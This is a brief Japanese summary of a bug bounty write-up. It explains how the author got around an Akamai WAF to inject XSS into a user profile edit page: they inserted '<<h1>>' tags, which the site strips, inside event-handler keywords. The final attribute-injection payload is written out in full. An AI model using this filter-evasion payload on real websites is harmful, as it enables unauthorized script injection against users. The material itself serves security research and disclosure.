Hello there, ('ω')ノ
Akamai WAFを使用してWebサイトをバイパスした方法を。
脆弱性:
XSS
記事:
https://medium.com/@yusifceferov_/how-i-bypassed-website-using-akamai-waf-e4e907aeb161
今回は、AkamaiのWAFの使用してWebサイトをバイパスした方法を紹介することに。
ウェブサイトのユーザ情報編集ページでxssを実行すると。
ウェブサイトは、下記を受け入れたもののAkamaiのWAFとRegexを使用していて。
“,’,<,>
次に、alert、prompt、<script>などを入力すると。
ウェブサイトの応答は、403 Forbidden AccessDeniedで。
さらに下記を入力すると。
A A A<<h1>>A
ウェブサイトは、<<h1>>を削除して下記の応答をしてくれたので。
A A AA
この方法で、ウェブサイトをバイパスすることを理解できて。
alert,prompt ⇨ 403 Forbidden
ale rt, pro m p t ⇨ 200 OK
aler<<h1>>r ⇨ 200 OK
よって、下記のペイロードを作成することに。
Jordisssaa” auto<<h1>>focus/on<<h1>>focus=ale<<h1>>rt(9);//
ウェブサイトは、<<h1>>を削除して文字列を結合してくれて。
Jordisssaa” autofocus/onfocus=alert(9);//
ソースコードにvalue値に入力することができて。
Best regards, (^^ゞ